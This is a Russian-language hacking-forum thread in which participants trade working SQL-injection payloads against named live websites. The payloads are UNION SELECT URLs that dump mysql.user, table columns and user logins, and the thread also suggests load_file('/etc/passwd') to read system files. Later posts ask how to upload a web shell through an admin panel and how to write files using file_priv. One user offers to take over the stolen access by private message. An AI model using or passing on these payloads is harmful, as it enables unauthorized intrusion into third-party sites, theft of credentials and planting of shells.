Сначала проверь, есть ли доступ к mysql.user union+select+1,2,user,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+mysql.user
при таком +union+select+1,2,user,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+mysql.user-- пишет SELECT command denied to user 'u1094094_sangha'@'ип сайта' for table 'user' - это значит что нет?
запрос: Code: SELECT 1 FROM mysql.user; наличие доступа к бд mysql или наоборот, отсутствие, не говорит о том, что у пользователя нет file_priv. еще раз говорю, попробуйте load_file('/etc/passwd'). в вашем случае /etc/passwd надо заенкодить в hex. отправьте доступ в лс, посмотрю
Подскажите,как вытащить есть таблица [users] стобцы из неё я могу прочитать,но вот дальше никак, таблица в квадратных скобках
)) уже по разному пробовала,не хочет http://bt c45.net/forum.php?sub=166 union select 1,2,3,4,TABLE_NAME,6,7 FROM INFORMATION_SCHEMA.TABLES LIMIT 98,1 кавычки фильтруются
колонки: Code: http://btc45.net/forum.php?sub=166+union+select+1,2,3,4,column_NAME,6,7+FROM+INFORMATION_SCHEMA.columns+where+table_name=0x5b75736572735d записи из таблицы: Code: http://btc45.net/forum.php?sub=166+union+select+1,2,3,4,login,6,7+FROM+`[users]`+limit+4,1 что именно он не хочет?
Есть админка, но запрещено заливать файлы .php только изображение, как можно залить шелл. Проинклудить не получается.
Что можно с этим сделать? http://www.kunst-forum.ch/suchresultate/?tx_artbase%5Baction%5D=performSearch&tx_artbase%5Bcontroller%5D=Search&cHash=bdd49c98329a5db8044c192d4033f887&tx_artbase[__referrer][extensionName]=Artbase&tx_artbase[__referrer][controllerName]=Search&tx_artbase[__referrer][actionName]=showSearchForm&tx_artbase[__hmac]=a:3:{s:11:%22searchfield%22;i:1;s:6:%22action%22;i:1;s:10:%22controller%22;i:1;}5165223b6f84dec570ccfd7b1d7a2f1958787a14&tx_artbase[searchfield]=a? урезал лишнее http://www.kunst-forum.ch/suchresultate/?tx_artbase%5Baction%5D=performSearch&tx_artbase%5Bcontroller%5D=Search&cHash=d57aa66360d76c68d7dc4a736c29512a&tx_artbase%5Bsearchfield%5D=Craig
сайт на вп, есть рут бд, file_priv Y , админка заблочена по ип, прочитать файлы могу, а вот заливка при файл прив не работает, путь раскрыл. перепробовал все папки вп выдет ерор 13 cant create\write
нет. таже ошибка, перепробовал уже все пути. читается все, файл прив Y ,доступ рут, но не куда записать не могу, пути раскрыл .. не пойму что за беда такая
http://www.cyberciti.biz/faq/mysqld-innodb-error-unable-to-create-temporary-file/ Файлы же льются не прямо в директорию(host ->dir), а host -> tmp ->dir.
Если доступ есть на чтение файлов и к базе, то может лучше ковырять в сторону админской учетки форума\сайта?